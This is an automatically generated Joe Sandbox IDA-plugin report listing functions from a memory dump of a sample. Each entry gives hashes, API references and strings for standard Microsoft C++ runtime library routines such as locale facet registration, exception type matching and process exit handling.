Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 8665bc79c658eedb49e5468cc06b4a2c48bcc04a11f9f7d40f568e2c3380da84
Instruction ID: 9dfc3e466f546a23b8ece64e7ba258729aa7a001414331b38b6436fd0151e688
Opcode Fuzzy Hash: 8665bc79c658eedb49e5468cc06b4a2c48bcc04a11f9f7d40f568e2c3380da84
Instruction Fuzzy Hash: FD01007A9006159FCB04EB649915BAEB7B0AFA4728F24000FF4006B392DF389E058B98

Function 004B57C2 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B57C9
std::_Lockit::_Lockit.LIBCPMT ref: 004B57D3
int.LIBCPMT ref: 004B57EA

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004B5824
std::_Lockit::~_Lockit.LIBCPMT ref: 004B5844
Concurrency::cancel_current_task.LIBCPMT ref: 004B5851

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: eeccaad5d24ca22f1e7f5014713da62b0dc25e6695d81197a292ceb5af32660b
Instruction ID: 0feaa0d3c1ff873de5c01ab5ff35510d7b3753c5a71bb0e2a203d20654dec3ce
Opcode Fuzzy Hash: eeccaad5d24ca22f1e7f5014713da62b0dc25e6695d81197a292ceb5af32660b
Instruction Fuzzy Hash: E201CE3A9006158BCB01AB659856BAEB7B0AF90314F14000EF91067392DF389E058BA9

Function 004B5857 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B585E
std::_Lockit::_Lockit.LIBCPMT ref: 004B5868
int.LIBCPMT ref: 004B587F

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004B58B9
std::_Lockit::~_Lockit.LIBCPMT ref: 004B58D9
Concurrency::cancel_current_task.LIBCPMT ref: 004B58E6

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 12a129d6ff67dc3f9e493dd0dc4240550bbb429c205d4b68f0eb3e6d0f20a3d3
Instruction ID: 7956155475b1ce95943770200be0e148bb05553c22357e504fd38e4e3d636a3e
Opcode Fuzzy Hash: 12a129d6ff67dc3f9e493dd0dc4240550bbb429c205d4b68f0eb3e6d0f20a3d3
Instruction Fuzzy Hash: 5C01E17A9006198BCB00FF619905BAEB7B0AFA4315F24000EF40067392DF3C9E058B99

Function 004B58EC Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B58F3
std::_Lockit::_Lockit.LIBCPMT ref: 004B58FD
int.LIBCPMT ref: 004B5914

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004B594E
std::_Lockit::~_Lockit.LIBCPMT ref: 004B596E
Concurrency::cancel_current_task.LIBCPMT ref: 004B597B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4ec8e8db11056d8522b93450926ebd209c94fe4e26b15a294f198f04d2a90c54
Instruction ID: 263da06f00c9534312745b4c2fe3924fbe3fa473725cdf98f23c189465d088a5
Opcode Fuzzy Hash: 4ec8e8db11056d8522b93450926ebd209c94fe4e26b15a294f198f04d2a90c54
Instruction Fuzzy Hash: 3901E17A900A15CBCB01EBA1D815BAEB771AF55725F14000FF40067291EF389E058B98

Function 004B5981 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B5988
std::_Lockit::_Lockit.LIBCPMT ref: 004B5992
int.LIBCPMT ref: 004B59A9

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Facet_Register.LIBCPMT ref: 004B59E3
std::_Lockit::~_Lockit.LIBCPMT ref: 004B5A03
Concurrency::cancel_current_task.LIBCPMT ref: 004B5A10

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 2e05e07ddf0e9ac06b8e0806e2e4ea71677d4f82f8d68e3b171a07e2ddd97127
Instruction ID: a7b686dde033d2c13b3bbd6de6a5a7ccfc289e88c7b55f546e15b8d4ebe6377d
Opcode Fuzzy Hash: 2e05e07ddf0e9ac06b8e0806e2e4ea71677d4f82f8d68e3b171a07e2ddd97127
Instruction Fuzzy Hash: E401ED7A9006158BCB01EB619856BFEB7B4BFA5324F28000FF4017B391DF389E048B98

Function 004B4D48 Relevance: 9.0, APIs: 6, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B4D4F
std::_Lockit::_Lockit.LIBCPMT ref: 004B4D59
int.LIBCPMT ref: 004B4D70

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

ctype.LIBCPMT ref: 004B4D93
std::_Lockit::~_Lockit.LIBCPMT ref: 004B4DCA

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3ctype
String ID:
API String ID: 3358926169-0
Opcode ID: 30047c7f5a0db3fbaeba3eec08d3d69f66e7e5bb93b36cabeb77466c9af7cded
Instruction ID: 15fd4270bbccaf921659e061fb304454778523fe790aa2bd5cd765a61065efd8
Opcode Fuzzy Hash: 30047c7f5a0db3fbaeba3eec08d3d69f66e7e5bb93b36cabeb77466c9af7cded
Instruction Fuzzy Hash: 7EF0623A8002199BCB04EBA18852BEE6634AB51725F54055EF5106B2D3EF3C9A058798

Function 004B4DDD Relevance: 9.0, APIs: 6, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B4DE4
std::_Lockit::_Lockit.LIBCPMT ref: 004B4DEE
int.LIBCPMT ref: 004B4E05

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

ctype.LIBCPMT ref: 004B4E28
std::_Lockit::~_Lockit.LIBCPMT ref: 004B4E5F

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3ctype
String ID:
API String ID: 3358926169-0
Opcode ID: 7ba368cac293963fbf6be08adbae417d29856e9484e32eb24c503225f053022d
Instruction ID: fda09bb6e5e4e71c906dc2039e129b6842906c39391b1b3011d081c9c9791eae
Opcode Fuzzy Hash: 7ba368cac293963fbf6be08adbae417d29856e9484e32eb24c503225f053022d
Instruction Fuzzy Hash: DDF0963AC101059BDF04EBA59852BFE7630AFA4729F14044FF9106B2D2EF3C9E058B98

Function 004B4E72 Relevance: 9.0, APIs: 6, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B4E79
std::_Lockit::_Lockit.LIBCPMT ref: 004B4E83
int.LIBCPMT ref: 004B4E9A

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

messages.LIBCPMT ref: 004B4EBD
std::_Lockit::~_Lockit.LIBCPMT ref: 004B4EF4

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
String ID:
API String ID: 50917705-0
Opcode ID: 387d2acbed7794722a6861812682bf4f92e13709f40e1a3a8258eb1985bb7146
Instruction ID: 3d83ff4885170b0e7ed2318c1e18a6a57052ea1aa37005085df03a568ab59f59
Opcode Fuzzy Hash: 387d2acbed7794722a6861812682bf4f92e13709f40e1a3a8258eb1985bb7146
Instruction Fuzzy Hash: 11F0C23A8001099BCB00EB618812BBE7260AB90769F10050EF5106B293EF3C9E048758

Function 004B4F07 Relevance: 9.0, APIs: 6, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B4F0E
std::_Lockit::_Lockit.LIBCPMT ref: 004B4F18
int.LIBCPMT ref: 004B4F2F

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

messages.LIBCPMT ref: 004B4F52
std::_Lockit::~_Lockit.LIBCPMT ref: 004B4F89

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
String ID:
API String ID: 50917705-0
Opcode ID: dcb75a9231ee922bc39f18085474ca21733e20093bf55318a410d46d450d558e
Instruction ID: e9a25940a7b1f414cdaacb5423a2b48c8d6d9a864183051f40e47a6105183c5f
Opcode Fuzzy Hash: dcb75a9231ee922bc39f18085474ca21733e20093bf55318a410d46d450d558e
Instruction Fuzzy Hash: 46F0903A9006099BDB04FBA58812BFE7725AF60769F14054FF4106B2E2EF3C9E048B59

Function 004D4D03 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getSignedDimension.LIBCMT ref: 004D4D54

Strings

8`R, xrefs: 004D4D32, 004D4D3C
@`R, xrefs: 004D4DBE

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Decorator::getDimensionSigned
String ID: 8`R$@`R
API String ID: 2996861206-4086647148
Opcode ID: 09e814bdfed3983dc6e42d9a223ced68f8c6251baffd6396c60cde383a5da650
Instruction ID: 03116165c4baad66ce14e124900c303883f4918f8448c9206f31b6d1f8867c35
Opcode Fuzzy Hash: 09e814bdfed3983dc6e42d9a223ced68f8c6251baffd6396c60cde383a5da650
Instruction Fuzzy Hash: D5318375A002099BDF14DBA5D865BEFB7F9AB48305F10002FE501B3281DB3C5E098B69

Function 004FE618 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,0055BF92,00000104), ref: 004FE675

Strings

..., xrefs: 004FE6C3
Microsoft Visual C++ Runtime Library, xrefs: 004FE70A
<program name unknown>, xrefs: 004FE684
Runtime Error!Program: , xrefs: 004FE641

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: a6185c6385a93ade1818ba731a864fc30d8a0be0328d94553484632c86b0bb4a
Instruction ID: 5e9c76af4f6d6203689d04dc5b655c062f8eaf469b6a3e7ccb2197c57a2dac5e
Opcode Fuzzy Hash: a6185c6385a93ade1818ba731a864fc30d8a0be0328d94553484632c86b0bb4a
Instruction Fuzzy Hash: 53213A32A0031D26E62176725C8FE7F2F9CEFE5781B500836FE08912E2F619DE05C5A9

Function 004CE870 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

___TypeMatch.LIBVCRUNTIME ref: 004CE8C5
type_info::operator==.LIBVCRUNTIME ref: 004CE927

Strings

6L, xrefs: 004CE878, 004CE90E
6L, xrefs: 004CE8D4
`UR, xrefs: 004CE91E

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: MatchTypetype_info::operator==
String ID: 6L$6L$`UR
API String ID: 445925684-1609408963
Opcode ID: 05fb692c3226f1152cb0907c8acf50fc8c45788a17188cab7e1f0349c8ce1e67
Instruction ID: 42101523472f658ae6aa082c50570fcef48b62fcd77d76929639cc83ba358f4f
Opcode Fuzzy Hash: 05fb692c3226f1152cb0907c8acf50fc8c45788a17188cab7e1f0349c8ce1e67
Instruction Fuzzy Hash: D0314F79E00219AFDB50DF9ED981AAEB7F9EF49314B14806EE914E7301D334ED019BA4

Function 004B9E5D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B9E64
_Getvals.LIBCPMT ref: 004B9EB6
_Mpunct.LIBCPMT ref: 004B9EF1
_Mpunct.LIBCPMT ref: 004B9F0B

Strings

$+xv, xrefs: 004B9F16

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: c99f104efd02b1bee557dbae3b396edd143d6d752a06f866db32ba3d1d01d814
Instruction ID: a3698c7bd79eb3218e14b3b21c6e8589ef2388df5f404f570cfeabe3f1a8fdb8
Opcode Fuzzy Hash: c99f104efd02b1bee557dbae3b396edd143d6d752a06f866db32ba3d1d01d814
Instruction Fuzzy Hash: 0921A3B1804A566FDB25DF75848077B7EF8AB08304F04495FE599C7A41E338EA01CBA4

Function 004A8DD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004A8DDB
std::_Lockit::_Lockit.LIBCPMT ref: 004A8DE5
std::_Lockit::~_Lockit.LIBCPMT ref: 004A8E8C
Concurrency::cancel_current_task.LIBCPMT ref: 004A8E97

Strings

04R, xrefs: 004A8FFF

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
String ID: 04R
API String ID: 4244582100-3848667053
Opcode ID: e80a534ac10e535a3f1c1aece7bc1bfe2643b10ae573c10660bbde5e323ab175
Instruction ID: a168d4634b89de9f1c9c0686075c299e8210886f24571b97df38ad342adaa980
Opcode Fuzzy Hash: e80a534ac10e535a3f1c1aece7bc1bfe2643b10ae573c10660bbde5e323ab175
Instruction Fuzzy Hash: 33213B35A00616DFDB04EF15C891A6EB7A1FF5A714F00845EE8159B3A1DF38AD11CF88

Function 004CA3A7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 63COMMON

Download Yara Rule

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 004CA43B

Strings

csm, xrefs: 004CA3C1
MOC, xrefs: 004CA3B9
`UR, xrefs: 004CA436
RCC, xrefs: 004CA3B1

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$`UR$csm
API String ID: 3140442014-251590930
Opcode ID: 96e4ddee6b082c770a49c12b1379c536aa52c7f647786566926e20510ff2b12f
Instruction ID: 82467efbb91c8a426eed65e6cb71dfc84cb8c59e49696a1897c5001d5d17910e
Opcode Fuzzy Hash: 96e4ddee6b082c770a49c12b1379c536aa52c7f647786566926e20510ff2b12f
Instruction Fuzzy Hash: 2511AF79510208EFC7589F65C455F9AB7A8EF00319F1640AFE80487262D7BCE951CB9A

Function 004B1D0B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 004B1D2B
_Maklocstr.LIBCPMT ref: 004B1D48
_Maklocstr.LIBCPMT ref: 004B1D65

Strings

HSR, xrefs: 004B1D57
04R, xrefs: 004B1D3A

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Maklocstr
String ID: 04R$HSR
API String ID: 2987148671-2904389986
Opcode ID: bd9118338d3e1ca8a383f2f7e6e32f1116472a6b6738832b215178dc57efc065
Instruction ID: ba1aeb87def8a9b91208915f8345e37aae2e4235999fd3c2ce5eb0ef8bee0d9d
Opcode Fuzzy Hash: bd9118338d3e1ca8a383f2f7e6e32f1116472a6b6738832b215178dc57efc065
Instruction Fuzzy Hash: 151158B1500684BAEB20DBA5D891FA6B7ECAF05758F04061AB145CBA50D3A8F950C7A9

Function 004FFD7D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9496FA04,?,?,00000000,005219D6,000000FF,?,004FFD04,00000002,YnM,004FFCD8,YnM), ref: 004FFDB2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004FFDC4
FreeLibrary.KERNEL32(00000000,?,?,00000000,005219D6,000000FF,?,004FFD04,00000002,YnM,004FFCD8,YnM), ref: 004FFDE6

Strings

CorExitProcess, xrefs: 004FFDBC
mscoree.dll, xrefs: 004FFDAB

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 39a970f561dedd7436bd44ef1d7d6e78455d72915026c3b13bb506bd7859ba2d
Instruction ID: 32df389409863973b5f15fca81adf22721154b57192085adf4b0a4dfc351f84f
Opcode Fuzzy Hash: 39a970f561dedd7436bd44ef1d7d6e78455d72915026c3b13bb506bd7859ba2d
Instruction Fuzzy Hash: 02016231A44629ABDB259B50DD0AFBEBBB8FF15B11F000526E912A27D0DB789904CA94

